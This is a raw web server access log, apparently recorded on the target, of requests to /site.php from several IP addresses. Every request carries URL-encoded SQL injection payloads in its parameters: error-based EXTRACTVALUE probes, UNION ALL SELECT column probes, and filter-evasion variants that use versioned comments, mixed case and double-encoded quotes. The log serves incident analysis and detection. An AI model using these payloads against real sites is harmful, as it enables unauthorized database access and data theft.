170.82.105.201 - - [17/Aug/2026:18:34:16 -0400] "GET /site.php?linkid=305&srsltid=%C3%80%C2%A7%C3%80%C2%A2%252527%29%2F**%2FAND%2F**%2F%28%C3%80%C2%A7%C3%80%C2%A2%252527yzdpjn%C3%80%C2%A7%C3%80%C2%A2%252527%3D%C3%80%C2%A7%C3%80%C2%A2%252527yzdpjn%C3%80%C2%A7%C3%80%C2%A2%252527AND%2F**%2FEXTRACTVALUE%284287%2CCONCAT%280x7e%2C%28%28SELECT%2F**%2F%28ELT%284287%3D4287%2C1%29%29%29%29%2C0x7e%29%29 HTTP/1.1" 403 199
105.209.176.49 - - [17/Aug/2026:18:34:17 -0400] "GET /site.php?linkid=%29%2F*%2150000AND*%2F%28255698532%3D255698532AND%2F**%2FEXTRACTVALUE%288835%2C%2F*%2150000CONCAT*%2F%280x7e%2C%28%28%2F*%2150000SELECT*%2F%28ELT%288835%3D8835%2C1%29%29%29%29%2C0x7e%29%29&srsltid=AfmBOoqf6j8OSnxN_GvKVXwkOkZSorrRKuKrWvVVAnDC7-YXGH1AWBS5 HTTP/1.1" 403 199
180.195.102.7 - - [17/Aug/2026:18:34:17 -0400] "GET /site.php?linkid=305&srsltid=AfmBOoqf6j8OSnxN_GvKVXwkOkZSorrRKuKrWvVVAnDC7-YXGH1AWBS5%27%20UNION%20ALL%20SELECT%20%27tkfgaycxxxwsjaqwcexwmrxgrbpdhkxh%27%2CNULL%2CNULL--%208nid9f HTTP/1.1" 302 215
190.104.124.40 - - [17/Aug/2026:18:34:17 -0400] "GET /site.php?linkid=-305%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2C%27gyxlxahzkxwwbxoxzjbhinfnbolktmyz%27%2CNULL--%20sau01u&srsltid=AfmBOoqf6j8OSnxN_GvKVXwkOkZSorrRKuKrWvVVAnDC7-YXGH1AWBS5 HTTP/1.1" 200 215
170.82.105.201 - - [17/Aug/2026:18:34:17 -0400] "GET /site.php?linkid=305&srsltid=%252527%29%2F**%2FAND%2F**%2F%28%252527uJcAZM%252527%3D%252527UJCazm%252527AND%2F**%2FEXTRACTVALUE%284287%2CCONCAT%280x7e%2C%28%28SELECT%2F**%2F%28ELT%284287%3D4287%2C1%29%29%29%29%2C0x7e%29%29 HTTP/1.1" 403 199
190.104.124.40 - - [17/Aug/2026:18:34:17 -0400] "GET /site.php?linkid=305%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2C%27gyxlxahzkxwwbxoxzjbhinfnbolktmyz%27--%20z9xc9i&srsltid=AfmBOoqf6j8OSnxN_GvKVXwkOkZSorrRKuKrWvVVAnDC7-YXGH1AWBS5 HTTP/1.1" 200 215
105.209.176.49 - - [17/Aug/2026:18:34:17 -0400] "GET /site.php?linkid=%29%2F**%2FAND%2F**%2F%281496819144%3D1496819144AND%2F**%2FEXTRACTVALUE%288835%2CCONCAT%280x7e%2C%28%28SELECT%2F**%2F%28ELT%288835%3D8835%2C1%29%29%29%29%2C0x7e%29%29&srsltid=AfmBOoqf6j8OSnxN_GvKVXwkOkZSorrRKuKrWvVVAnDC7-YXGH1AWBS5 HTTP/1.1" 403 199
170.82.105.201 - - [17/Aug/2026:18:34:17 -0400] "GET /site.php?linkid=305&srsltid=AfmBOoqf6j8OSnxN_GvKVXwkOkZSorrRKuKrWvVVAnDC7-YXGH1AWBS5%25%27%29%20AND%20EXTRACTVALUE%285606%2CCONCAT%280x7e%2C%28%28SELECT%20%28ELT%285606%3D5606%2C1%29%29%29%29%2C0x7e%29%29--%20- HTTP/1.1" 403 199
180.195.102.7 - - [17/Aug/2026:18:34:18 -0400] "GET /site.php?linkid=305&srsltid=AfmBOoqf6j8OSnxN_GvKVXwkOkZSorrRKuKrWvVVAnDC7-YXGH1AWBS5%27%20UNION%20ALL%20SELECT%20%27tkfgaycxxxwsjaqwcexwmrxgrbpdhkxh%27%2CNULL%2CNULL--%208nid9f HTTP/1.1" 302 215
170.82.105.201 - - [17/Aug/2026:18:34:18 -0400] "GET /site.php?linkid=305&srsltid=%27%29%20AND%20%28%27sbason%27%3D%27sbason%27AND%20EXTRACTVALUE%285606%2CCONCAT%280x7e%2C%28%28SELECT%20%28ELT%285606%3D5606%2C1%29%29%29%29%2C0x7e%29%29 HTTP/1.1" 403 199
105.209.176.49 - - [17/Aug/2026:18:34:18 -0400] "GET /site.php?linkid=%29%2F**%2FaNd%2F**%2F%281192536015%3D1192536015aND%2F**%2FextrActvAlUE%288835%2CcONCAT%280X7e%2C%28%28seLect%2F**%2F%28ElT%288835%3D8835%2C1%29%29%29%29%2C0X7E%29%29&srsltid=AfmBOoqf6j8OSnxN_GvKVXwkOkZSorrRKuKrWvVVAnDC7-YXGH1AWBS5 HTTP/1.1" 403 199
190.104.124.40 - - [17/Aug/2026:18:34:18 -0400] "GET /site.php?linkid=-305%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2C%27gyxlxahzkxwwbxoxzjbhinfnbolktmyz%27--%20z9xc9i&srsltid=AfmBOoqf6j8OSnxN_GvKVXwkOkZSorrRKuKrWvVVAnDC7-YXGH1AWBS5 HTTP/1.1" 200 215
189.251.75.137 - - [17/Aug/2026:18:34:18 -0400] "GET /site.php?linkid=305&srsltid=AfmBOoqf6j8OSnxN_GvKVXwkOkZSorrRKuKrWvVVAnDC7-YXGH1AWBS5%27%20UNION%20ALL%20SELECT%20NULL%2C%27tkfgaycxxxwsjaqwcexwmrxgrbpdhkxh%27%2CNULL--%202tw4k7 HTTP/1.1" 302 215
170.82.105.201 - - [17/Aug/2026:18:34:18 -0400] "GET /site.php?linkid=305&srsltid=%27%29%2F**%2FAND%2F**%2F%28%27xndkxp%27%3D%27xndkxp%27AND%2F**%2FEXTRACTVALUE%285606%2CCONCAT%280x7e%2C%28%28SELECT%2F**%2F%28ELT%285606%3D5606%2C1%29%29%29%29%2C0x7e%29%29 HTTP/1.1" 403 199
105.209.176.49 - - [17/Aug/2026:18:34:19 -0400] "GET /site.php?linkid=305%60%29%20AND%20EXTRACTVALUE%289101%2CCONCAT%280x7e%2C%28%28SELECT%20%28ELT%289101%3D9101%2C1%29%29%29%29%2C0x7e%29%29--%20-&srsltid=AfmBOoqf6j8OSnxN_GvKVXwkOkZSorrRKuKrWvVVAnDC7-YXGH1AWBS5 HTTP/1.1" 403 199
190.104.124.40 - - [17/Aug/2026:18:34:19 -0400] "GET /site.php?linkid=305%27%20UNION%20ALL%20SELECT%20%27gyxlxahzkxwwbxoxzjbhinfnbolktmyz%27%2CNULL%2CNULL%2CNULL%2CNULL--%205tv2ip&srsltid=AfmBOoqf6j8OSnxN_GvKVXwkOkZSorrRKuKrWvVVAnDC7-YXGH1AWBS5 HTTP/1.1" 200 215
170.82.105.201 - - [17/Aug/2026:18:34:19 -0400] "GET /site.php?linkid=305&srsltid=%27%29%2F**%2FAND%2F**%2F%28%27PCinSk%27%3D%27PCiNsk%27AND%2F**%2FEXTRACTVALUE%285606%2CCONCAT%280x7e%2C%28%28SELECT%2F**%2F%28ELT%285606%3D5606%2C1%29%29%29%29%2C0x7e%29%29 HTTP/1.1" 403 199
189.251.75.137 - - [17/Aug/2026:18:34:19 -0400] "GET /site.php?linkid=305&srsltid=AfmBOoqf6j8OSnxN_GvKVXwkOkZSorrRKuKrWvVVAnDC7-YXGH1AWBS5%27%20UNION%20ALL%20SELECT%20NULL%2C%27tkfgaycxxxwsjaqwcexwmrxgrbpdhkxh%27%2CNULL--%202tw4k7 HTTP/1.1" 302 215
190.104.124.40 - - [17/Aug/2026:18:34:19 -0400] "GET /site.php?linkid=-305%27%20UNION%20ALL%20SELECT%20%27gyxlxahzkxwwbxoxzjbhinfnbolktmyz%27%2CNULL%2CNULL%2CNULL%2CNULL--%205tv2ip&srsltid=AfmBOoqf6j8OSnxN_GvKVXwkOkZSorrRKuKrWvVVAnDC7-YXGH1AWBS5 HTTP/1.1" 200 215
105.209.176.49 - - [17/Aug/2026:18:34:19 -0400] "GET /site.php?linkid=%29%20AND%20%281687705520%3D1687705520AND%20EXTRACTVALUE%289101%2CCONCAT%280x7e%2C%28%28SELECT%20%28ELT%289101%3D9101%2C1%29%29%29%29%2C0x7e%29%29&srsltid=AfmBOoqf6j8OSnxN_GvKVXwkOkZSorrRKuKrWvVVAnDC7-YXGH1AWBS5 HTTP/1.1" 403 199
170.82.105.201 - - [17/Aug/2026:18:34:19 -0400] "GET /site.php?linkid=305&srsltid=%27%29%2F*%2150000AND*%2F%28%27fxpnsf%27%3D%27fxpnsf%27%2F*%2150000AND*%2FEXTRACTVALUE%285606%2C%2F*%2150000CONCAT*%2F%280x7e%2C%28%28%2F*%2150000SELECT*%2F%28ELT%285606%3D5606%2C1%29%29%29%29%2C0x7e%29%29 HTTP/1.1" 403 199
170.82.105.201 - - [17/Aug/2026:18:34:20 -0400] "GET /site.php?linkid=305&srsltid=%C3%80%C2%A7%C3%80%C2%A2%252527%29%2F**%2FAND%2F**%2F%28%C3%80%C2%A7%C3%80%C2%A2%252527pklmek%C3%80%C2%A7%C3%80%C2%A2%252527%3D%C3%80%C2%A7%C3%80%C2%A2%252527pklmek%C3%80%C2%A7%C3%80%C2%A2%252527AND%2F**%2FEXTRACTVALUE%285606%2CCONCAT%280x7e%2C%28%28SELECT%2F**%2F%28ELT%285606%3D5606%2C1%29%29%29%29%2C0x7e%29%29 HTTP/1.1" 403 199
189.251.75.137 - - [17/Aug/2026:18:34:20 -0400] "GET /site.php?linkid=305&srsltid=AfmBOoqf6j8OSnxN_GvKVXwkOkZSorrRKuKrWvVVAnDC7-YXGH1AWBS5%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2C%27tkfgaycxxxwsjaqwcexwmrxgrbpdhkxh%27--%20ztvhl3 HTTP/1.1" 302 215
105.209.176.49 - - [17/Aug/2026:18:34:20 -0400] "GET /site.php?linkid=%29%2F**%2FAND%2F**%2F%28634792663%3D634792663AND%2F**%2FEXTRACTVALUE%289101%2CCONCAT%280x7e%2C%28%28SELECT%2F**%2F%28ELT%289101%3D9101%2C1%29%29%29%29%2C0x7e%29%29&srsltid=AfmBOoqf6j8OSnxN_GvKVXwkOkZSorrRKuKrWvVVAnDC7-YXGH1AWBS5 HTTP/1.1" 403 199
190.104.124.40 - - [17/Aug/2026:18:34:20 -0400] "GET /site.php?linkid=305%27%20UNION%20ALL%20SELECT%20NULL%2C%27gyxlxahzkxwwbxoxzjbhinfnbolktmyz%27%2CNULL%2CNULL%2CNULL--%2001mgak&srsltid=AfmBOoqf6j8OSnxN_GvKVXwkOkZSorrRKuKrWvVVAnDC7-YXGH1AWBS5 HTTP/1.1" 200 215
170.82.105.201 - - [17/Aug/2026:18:34:21 -0400] "GET /site.php?linkid=305&srsltid=%252527%29%2F**%2FAND%2F**%2F%28%252527uCJWeJ%252527%3D%252527UCjWEj%252527AND%2F**%2FEXTRACTVALUE%285606%2CCONCAT%280x7e%2C%28%28SELECT%2F**%2F%28ELT%285606%3D5606%2C1%29%29%29%29%2C0x7e%29%29 HTTP/1.1" 403 199
190.104.124.40 - - [17/Aug/2026:18:34:21 -0400] "GET /site.php?linkid=-305%27%20UNION%20ALL%20SELECT%20NULL%2C%27gyxlxahzkxwwbxoxzjbhinfnbolktmyz%27%2CNULL%2CNULL%2CNULL--%2001mgak&srsltid=AfmBOoqf6j8OSnxN_GvKVXwkOkZSorrRKuKrWvVVAnDC7-YXGH1AWBS5 HTTP/1.1" 200 215
105.209.176.49 - - [17/Aug/2026:18:34:21 -0400] "GET /site.php?linkid=%29%2F**%2FaNd%2F**%2F%281040093292%3D1040093292AnD%2F**%2FeXTrAcTvalue%289101%2CcOnCAT%280X7e%2C%28%28SeLect%2F**%2F%28ELT%289101%3D9101%2C1%29%29%29%29%2C0x7E%29%29&srsltid=AfmBOoqf6j8OSnxN_GvKVXwkOkZSorrRKuKrWvVVAnDC7-YXGH1AWBS5 HTTP/1.1" 403 199
170.82.105.201 - - [17/Aug/2026:18:34:21 -0400] "GET /site.php?linkid=305&srsltid=AfmBOoqf6j8OSnxN_GvKVXwkOkZSorrRKuKrWvVVAnDC7-YXGH1AWBS5%22%29%20AND%20EXTRACTVALUE%287944%2CCONCAT%280x7e%2C%28%28SELECT%20%28ELT%287944%3D7944%2C1%29%29%29%29%2C0x7e%29%29--%20- HTTP/1.1" 403 199
190.104.124.40 - - [17/Aug/2026:18:34:21 -0400] "GET /site.php?linkid=305%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2C%27gyxlxahzkxwwbxoxzjbhinfnbolktmyz%27%2CNULL%2CNULL--%205cnikx&srsltid=AfmBOoqf6j8OSnxN_GvKVXwkOkZSorrRKuKrWvVVAnDC7-YXGH1AWBS5 HTTP/1.1" 200 215
190.104.124.40 - - [17/Aug/2026:18:34:22 -0400] "GET /site.php?linkid=-305%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2C%27gyxlxahzkxwwbxoxzjbhinfnbolktmyz%27%2CNULL%2CNULL--%205cnikx&srsltid=AfmBOoqf6j8OSnxN_GvKVXwkOkZSorrRKuKrWvVVAnDC7-YXGH1AWBS5 HTTP/1.1" 200 215
170.82.105.201 - - [17/Aug/2026:18:34:22 -0400] "GET /site.php?linkid=305&srsltid=%27%29%20AND%20%28%27ynwich%27%3D%27ynwich%27AND%20EXTRACTVALUE%287944%2CCONCAT%280x7e%2C%28%28SELECT%20%28ELT%287944%3D7944%2C1%29%29%29%29%2C0x7e%29%29 HTTP/1.1" 403 199
105.209.176.49 - - [17/Aug/2026:18:34:22 -0400] "GET /site.php?linkid=%29%2F*%2150000AND*%2F%28884164903%3D884164903AND%2F**%2FEXTRACTVALUE%289101%2C%2F*%2150000CONCAT*%2F%280x7e%2C%28%28%2F*%2150000SELECT*%2F%28ELT%289101%3D9101%2C1%29%29%29%29%2C0x7e%29%29&srsltid=AfmBOoqf6j8OSnxN_GvKVXwkOkZSorrRKuKrWvVVAnDC7-YXGH1AWBS5 HTTP/1.1" 403 199
190.104.124.40 - - [17/Aug/2026:18:34:22 -0400] "GET /site.php?linkid=305%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2C%27gyxlxahzkxwwbxoxzjbhinfnbolktmyz%27%2CNULL--%20sau01u&srsltid=AfmBOoqf6j8OSnxN_GvKVXwkOkZSorrRKuKrWvVVAnDC7-YXGH1AWBS5 HTTP/1.1" 200 215
